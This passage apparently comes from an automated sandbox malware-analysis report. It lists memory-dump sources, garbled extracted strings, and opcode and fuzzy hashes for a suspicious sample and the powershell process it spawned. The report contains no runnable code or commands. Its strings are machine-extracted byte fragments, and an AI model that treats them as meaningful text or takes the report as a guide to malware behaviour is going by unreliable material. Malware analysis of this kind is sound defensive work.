                          • CharPrevW.USER32(80000000,00000000,?,?,?,?,?), ref: 00406D4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: CharPrevlstrlen
                          • String ID: C:\Users\user\Desktop
                          • API String ID: 2709904686-224404859
                          • Opcode ID: f3194ec8bfc8aa9af91b6cc67001010a6a2c3316178bb9d23f4bbec53c2e5c5b
                          • Instruction ID: a73699a822f17830b99b7c1a49ea22a968a2329701a94a52d4a84ec236d7b83d
                          • Opcode Fuzzy Hash: f3194ec8bfc8aa9af91b6cc67001010a6a2c3316178bb9d23f4bbec53c2e5c5b
                          • Instruction Fuzzy Hash: 78D05E72105520DBC7526B28ED05CAF77BCEF0530034A846AE582E7274CB385C9187BD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4~l$4~l$tLsk$tLsk$tLsk$tLsk$x.rk$x.rk$x.rk$-rk$-rk
                          • API String ID: 0-2129042929
                          • Opcode ID: 39277e46ee572f478b6fb3605b75a64fb7f09e0767405b149beeba722057c218
                          • Instruction ID: e3e1d9675067b06f09f8c07d76f39b9992e4bd7b99e546188cd3a0f22adca85e
                          • Opcode Fuzzy Hash: 39277e46ee572f478b6fb3605b75a64fb7f09e0767405b149beeba722057c218
                          • Instruction Fuzzy Hash: D8F24EB4A00219DFCB24DB24CA50BDABBB6BF85314F1188A9D509AF751CB31ED85CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: \V%k
                          • API String ID: 0-4198323507
                          • Opcode ID: 2ae6d9fdfd4c50faf993d11ec27e83866999d577c8313e3b5c88da7a8090cdce
                          • Instruction ID: aa449a551cc946e75a97d7a930830611d6d41f2ce95241589976a6069958bd05
                          • Opcode Fuzzy Hash: 2ae6d9fdfd4c50faf993d11ec27e83866999d577c8313e3b5c88da7a8090cdce
                          • Instruction Fuzzy Hash: 2BB18C70E00619EFDB18CFA9DA9579EBBF2AF88304F148529D814A7354FB34A845DF81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e351e9b18bf0d043b2b91cbfde96ce69f7d6e4a8d5bcba3617272a1e3b6b28c1
                          • Instruction ID: cae928674c9d32ad353bd9d2b7da3abd654c470322ca77adb6b2b31ab187e09f
                          • Opcode Fuzzy Hash: e351e9b18bf0d043b2b91cbfde96ce69f7d6e4a8d5bcba3617272a1e3b6b28c1
                          • Instruction Fuzzy Hash: 5FB1AF70E00629EFDB18CFA8DA9179EBBF2AF48314F148529D805A7354FB34A845DF81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 90b4a52b518da45f732c99797f03ce82ad99b08e5cce7913d9fec205fc35463e
                          • Instruction ID: 98776087a4273a5da59a620a6050916e2141c948e4df3b5b3e00e95d17d3b5a7
                          • Opcode Fuzzy Hash: 90b4a52b518da45f732c99797f03ce82ad99b08e5cce7913d9fec205fc35463e
                          • Instruction Fuzzy Hash: AE41B235B40614AFDB19EF34C554AAABBF2EF8D351F084469D502EB3A0DB35AC41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$x.rk$x.rk$-rk$-rk
                          • API String ID: 0-4028008535
                          • Opcode ID: 7777f0334705b6755ae49de580c94b8ada4a902d68a5f4b5638983166990e097
                          • Instruction ID: 484fb5a6ff7f286ecdbca1842154a84f543a1325bb7c1f5b00949c7797aa6541
                          • Opcode Fuzzy Hash: 7777f0334705b6755ae49de580c94b8ada4a902d68a5f4b5638983166990e097
                          • Instruction Fuzzy Hash: 97C2D4B0A00215DFC724DF68C940BABBBF6AF85311F1488AAD419AF791CB31ED45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$4'^q$tLsk$tLsk$x.rk$x.rk$-rk$-rk
                          • API String ID: 0-2096596190
                          • Opcode ID: 0d162c03e6317add500400003a9adc25c7d0d5ff369da200013fd4db243b3e5e
                          • Instruction ID: 1c0916ec0d55515c05b27ec464bdf29d34ae4036fae1e2b27adfd1aa5d57d904
                          • Opcode Fuzzy Hash: 0d162c03e6317add500400003a9adc25c7d0d5ff369da200013fd4db243b3e5e
                          • Instruction Fuzzy Hash: DEB251B4A00215DFCB24DB64CA50BDABBB2FF89304F1089A9D5496F791CB32AD85CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8N%k$Hbq$h]%k$h]%k$h]%k$$^q$$^q$I%k
                          • API String ID: 0-125502114
                          • Opcode ID: ca6d8cfde452f0897e28216a298afbdbdb78278776bffb80933db4cbc29292c8
                          • Instruction ID: 2d641a8b135b911584b4fd410e39f807b78cc06ef5853bc3c665ae989a3d2b3f
                          • Opcode Fuzzy Hash: ca6d8cfde452f0897e28216a298afbdbdb78278776bffb80933db4cbc29292c8
                          • Instruction Fuzzy Hash: 0E224F30B005289FCB25EF24C9546AEB7F6AF89304F1484E9D40AAB351DF35AD86CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$$^q$$^q$$^q
                          • API String ID: 0-3272787073
                          • Opcode ID: db93d02785ff9c651cc28196969d117ea02db743f78d51aed9114af9b479490d
                          • Instruction ID: 32131504dd7dbd76e91f68228a5bd463db529042469f8e195d4323223577a355
                          • Opcode Fuzzy Hash: db93d02785ff9c651cc28196969d117ea02db743f78d51aed9114af9b479490d
                          • Instruction Fuzzy Hash: 691239B1B042068FC7148A6994406BBBBEAEFC5236F34847BD465CF361CB76D846C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$tLsk$x.rk$-rk
                          • API String ID: 0-900191345
                          • Opcode ID: f8de1083bbb64faa16a17a7a3fcf675b5724016dd0dd8e62d9f0e29e29cf5626
                          • Instruction ID: d1d251fcc71c095fbaff1a91514222bc4544ca0b46aaa33db519876db1cd12b6
                          • Opcode Fuzzy Hash: f8de1083bbb64faa16a17a7a3fcf675b5724016dd0dd8e62d9f0e29e29cf5626
                          • Instruction Fuzzy Hash: 1272A5B0A00215DFD724DF58C940BAAB7B6EF89311F1189AAD91AAFB40CB31ED45CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$4'^q$4'^q
                          • API String ID: 0-1420252700
                          • Opcode ID: 6ded52161a3716bd2bb58a04d7b4ca37ba10f107734a94cc63774a29e53debd5
                          • Instruction ID: aaf56ae432d7edcf230cd16c3b0d8697af108bfeffacd5e063c0247443506eee
                          • Opcode Fuzzy Hash: 6ded52161a3716bd2bb58a04d7b4ca37ba10f107734a94cc63774a29e53debd5
                          • Instruction Fuzzy Hash: 6A1228B17042068FCB258B6899007ABBBEAAFC5335F1488BBD905CF751DB32D845C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4~l$tLsk$x.rk
                          • API String ID: 0-4100223713
                          • Opcode ID: dc79e25154d4718310a65818a5b92772118ba0e14f21498bb9650705dfe56b46
                          • Instruction ID: 35f3dc2d7c8358b3803befe461fcc40c3b7e6d6287a60fc4d217a7d81ab6e9da
                          • Opcode Fuzzy Hash: dc79e25154d4718310a65818a5b92772118ba0e14f21498bb9650705dfe56b46
                          • Instruction Fuzzy Hash: 321241B0E00215DFDB64CB24CA40BEAB7B6FF45315F0188AAD55AAB791CB31AD81CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$x.rk$-rk
                          • API String ID: 0-1520546824
                          • Opcode ID: a7b3047dca606ebdb03f7d5411a89f1d5bb8672a881abfde50aa73dc056b93d1
                          • Instruction ID: 3987971d9eb2da3eeeb1244944c0026fa438e208293de073092f1f22c6f7346d
                          • Opcode Fuzzy Hash: a7b3047dca606ebdb03f7d5411a89f1d5bb8672a881abfde50aa73dc056b93d1
                          • Instruction Fuzzy Hash: 7B3282B0A00215DFD724DF58CA50F9AB7B2EB85314F1089AAD51A6FB81CB31ED85CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$x.rk$-rk
                          • API String ID: 0-1520546824
                          • Opcode ID: 51cdef36b0b5b09e478f57f439825f9efe5fbe245b1e367cd5f138003188d4d5
                          • Instruction ID: 5a919bfcf55e5bf9638f7c80a8d74a81317d899adc68e4f5e18d0a06b10ad873
                          • Opcode Fuzzy Hash: 51cdef36b0b5b09e478f57f439825f9efe5fbe245b1e367cd5f138003188d4d5
                          • Instruction Fuzzy Hash: 5A3253B4A00215DFCB24DB64CE50BDABBB2AF89304F1089A9D55A6F751CB31ED81CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: h]%k$I%k
                          • API String ID: 0-1680528202
                          • Opcode ID: 5384eca03844d5e9d2f62ec0965d4c58f77b3eef5a13a649a1587f44b7ab8091
                          • Instruction ID: b9b63d30c733e25c09dfc47c33d11b110dd64781b28e7e456ee7fbf733b2f3ed
                          • Opcode Fuzzy Hash: 5384eca03844d5e9d2f62ec0965d4c58f77b3eef5a13a649a1587f44b7ab8091
                          • Instruction Fuzzy Hash: 44315930B005289FCB269B24C9956EEB7F2BF89304F1044E9D409AB351DB35EE95CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: h2tk
                          • API String ID: 0-1762276652
                          • Opcode ID: 5ceabe6eef1bf02db720885a1a491ecaccf6567ec87bfb345cc078083692a5fb
                          • Instruction ID: 3e5278d3b56cfad2e6b4e7819fcc07146255375bd199c2e7c1dda95ee4fcd40e
                          • Opcode Fuzzy Hash: 5ceabe6eef1bf02db720885a1a491ecaccf6567ec87bfb345cc078083692a5fb
                          • Instruction Fuzzy Hash: EC027EB4B402099FD710CB98C540EAABBB6FF89315F14C56AE815AF795C732EC42CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: \V%k
                          • API String ID: 0-4198323507
                          • Opcode ID: 778feb598aae649830094f493766787cad0c453ed1d96de4db8c1914b5fb871e
                          • Instruction ID: 7936e9e914a7d7bf4f2eef48a3df2edf3e8882a9ee1706706d6a5f0cc03b7690
                          • Opcode Fuzzy Hash: 778feb598aae649830094f493766787cad0c453ed1d96de4db8c1914b5fb871e
                          • Instruction Fuzzy Hash: E4B17B70E00629EFDB14CFA8DA9579EBBF1BF48304F148129E815AB354EB74A845DF81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f8cb56bbebe83d3bc5af85da018a53bbafdd3a65798f62a48772540cf07ad7bb
                          • Instruction ID: ad891e13ded8eba6821f3909b61ddc7c1c8043d9df1a6e28977380b55b5d6d0f
                          • Opcode Fuzzy Hash: f8cb56bbebe83d3bc5af85da018a53bbafdd3a65798f62a48772540cf07ad7bb
                          • Instruction Fuzzy Hash: AB525EB4A00205DFC714CB58DA41A9AFBB2FF85329F15C46AE8059F795CB32EC52CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ab7f00db8f5692f7fab5d285a7505feb3586912f83cb0ebf8166f07c9721d6bf
                          • Instruction ID: aff2222ef9998bfd2810bd458ee6efef6b95b077a2c54a0b8038f9eb95261b45
                          • Opcode Fuzzy Hash: ab7f00db8f5692f7fab5d285a7505feb3586912f83cb0ebf8166f07c9721d6bf
                          • Instruction Fuzzy Hash: 25223AB4A00205DFD714CB58C940A9AFBB2FF85329F15C56AE805AF795CB72EC52CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bc1d2bd3e2f1be5288f7fffff5ca9ca04d05d84fe82db718a480260bb6ee8902
                          • Instruction ID: a2d76a8d2686c9a15ec975525596d8099dfbedcbdd920b2cdbf350204564401d
                          • Opcode Fuzzy Hash: bc1d2bd3e2f1be5288f7fffff5ca9ca04d05d84fe82db718a480260bb6ee8902
                          • Instruction Fuzzy Hash: 5C126DB0B402099FD714CB98C940EAABBF6EF89315F14C56AE8159F755CB32EC42CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f03795fa12811fece641546f209f47f45557ab36547a95e9027569537508c4b0
                          • Instruction ID: cdedac14503a090107fd66c07617ad4064cd9fe8c2ff8c8f1922b955c032f031
                          • Opcode Fuzzy Hash: f03795fa12811fece641546f209f47f45557ab36547a95e9027569537508c4b0
                          • Instruction Fuzzy Hash: C7123BB4A00205DFD724CB58CA41EAAFBB6BF85329F14C46AE8059F751CB71EC52CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 44680b76808ca03be1964b898698df7a514caa279295e515e769ea78fee7a054
                          • Instruction ID: 79de233df78352b1bf2e2756b6c45dffab730f7dce335e021174e2f3ec95b77c
                          • Opcode Fuzzy Hash: 44680b76808ca03be1964b898698df7a514caa279295e515e769ea78fee7a054
                          • Instruction Fuzzy Hash: 6EF14BB4A402099FD710CB98C540EAABBF6FF89325F14C56AE815AF755C732EC42CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 94b30b9a5601058df049811c83f9621255752e2aa6c3fa89470eb8992f719114
                          • Instruction ID: 8bda1f648c90fc07c3d9eb5fa8a6af867946e1bf4c71aac3839d0eb9703df82a
                          • Opcode Fuzzy Hash: 94b30b9a5601058df049811c83f9621255752e2aa6c3fa89470eb8992f719114
                          • Instruction Fuzzy Hash: BCF12974A00619EFCB05CF98D584AADBBB2FF88310F258559E805AB365D735ED82CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1f3113f3415d43b877d4df3bb197248375f6bf522fc420d989e3308d6c891662
                          • Instruction ID: e13662fca864062fcf152733248d76b4281d1cd292b559c725699e58d1c353f4
                          • Opcode Fuzzy Hash: 1f3113f3415d43b877d4df3bb197248375f6bf522fc420d989e3308d6c891662
                          • Instruction Fuzzy Hash: 7DC19D35A00618AFCB14DFA4CA44EADBBF2FF85315F154569E406AB364DB34AD49CF80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 225cd05a719cc537f856a5c629da87ba78d91d2174d8bed679c76f2da724d614
                          • Instruction ID: 8e571035f0a1f4e14467ffcddb2d88e296f6037bf0832be06be1fd3a68ffeee1
                          • Opcode Fuzzy Hash: 225cd05a719cc537f856a5c629da87ba78d91d2174d8bed679c76f2da724d614
                          • Instruction Fuzzy Hash: 29B19D70E00629EFDB14CFA8DA9179DBBF1BF48314F148529E805A7354EB74A885DF81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 05be9a0b00df30917277a3d37c4ccb6a2bb4bc87f64d49c6c8bd26fa7ebefe45
                          • Instruction ID: 5acda0517cabff08a8188204cbb7fd8c997bd29f4d129cb74c60b3da691477b7
                          • Opcode Fuzzy Hash: 05be9a0b00df30917277a3d37c4ccb6a2bb4bc87f64d49c6c8bd26fa7ebefe45
                          • Instruction Fuzzy Hash: 2F918FB0A00206DFC714CB58CA41F9EFBE6AF89325F15846AE505AF795CB32DC41CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 030f51ecb4d3fbd2fdf1097ba77fb098da6f1752538f4aa9a323294eeb78819e
                          • Instruction ID: 1409b31a1eca63ca5bd5d30b0bfa0084d34a9b31bc2f5a7f3fcadfc6c6d15af1
                          • Opcode Fuzzy Hash: 030f51ecb4d3fbd2fdf1097ba77fb098da6f1752538f4aa9a323294eeb78819e
                          • Instruction Fuzzy Hash: 327126B1B002069FCB209E799C402FBFBE9AF8522AF148877D545DB380EB31D955C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b496bae64af8e686855c5976ac713d4c77cfb63ed6cb40e9224f8d205e965f6a
                          • Instruction ID: 95243770caf5f81e47f686b3693c21b1dd09087c8783ea7ad6f5f57ad08aebf8
                          • Opcode Fuzzy Hash: b496bae64af8e686855c5976ac713d4c77cfb63ed6cb40e9224f8d205e965f6a
                          • Instruction Fuzzy Hash: AA915EB4A00206DFC714CB58C941FDAFBF6AF89329F15856AE9056F791CB32E841CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b09b5e7b347604b9886d6c35855a033c6feea83c6f9c06315c381f362c3690ff
                          • Instruction ID: 5cfc744b344a317ab03826a133c4a5d5468902c426c5df53c45e736c01093f24
                          • Opcode Fuzzy Hash: b09b5e7b347604b9886d6c35855a033c6feea83c6f9c06315c381f362c3690ff
                          • Instruction Fuzzy Hash: DC719B30A006199FCB14DF68C980A9DBBF6EF89315F18886AD455DB761EB31AC46CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 09c723efe5be5441121afd3aa9570d8729792b2c1fcec6ac9ef1944d547b5efb
                          • Instruction ID: 019bdbb7d83f705dc868b2bfde73f00c75930f28dbbc39a4960d5975bc0fb93c
                          • Opcode Fuzzy Hash: 09c723efe5be5441121afd3aa9570d8729792b2c1fcec6ac9ef1944d547b5efb
                          • Instruction Fuzzy Hash: 2D713D70E00618AFDB14DFA4D584BADBBF6BF88305F148869D412AB790DB31AD4ACF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aefce222e97e741cf0bc689d3c4bea9eafdf6c69541f078450430300b4a6e0cf
                          • Instruction ID: ea5ec25d205fb5ed5ad9bf31f5bcff0e7754788ea06a3a011c7a8928d01bd669
                          • Opcode Fuzzy Hash: aefce222e97e741cf0bc689d3c4bea9eafdf6c69541f078450430300b4a6e0cf
                          • Instruction Fuzzy Hash: 674117F0A04202DFCB228E688A416F7BBEAAF80235F1944A7D9048F756D735DD45C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2ebcc851cd03b5ec895232c028bb3985bb602cb70d8e9d440d894e503e331a21
                          • Instruction ID: 8d033f62ece58919917ea35156051a847b4cd253eeae558af9d1fda6c35d8c48
                          • Opcode Fuzzy Hash: 2ebcc851cd03b5ec895232c028bb3985bb602cb70d8e9d440d894e503e331a21
                          • Instruction Fuzzy Hash: 205134B1D00249DFDB10DFA9C584ADEBBF0BF48314F148029E40AAB214DB74A945CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a697951561d389979c86e0731970081632b0052ddd261f348c1af41267486a17
                          • Instruction ID: 63240c84d3d2355156c1784b7916bd54e09a9aacb1f26d78e38f54458de21760
                          • Opcode Fuzzy Hash: a697951561d389979c86e0731970081632b0052ddd261f348c1af41267486a17
                          • Instruction Fuzzy Hash: 8C417F30A006189FDB14DFA5C984AADBBF2BF88315F148869D001AB760EB71AC45CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
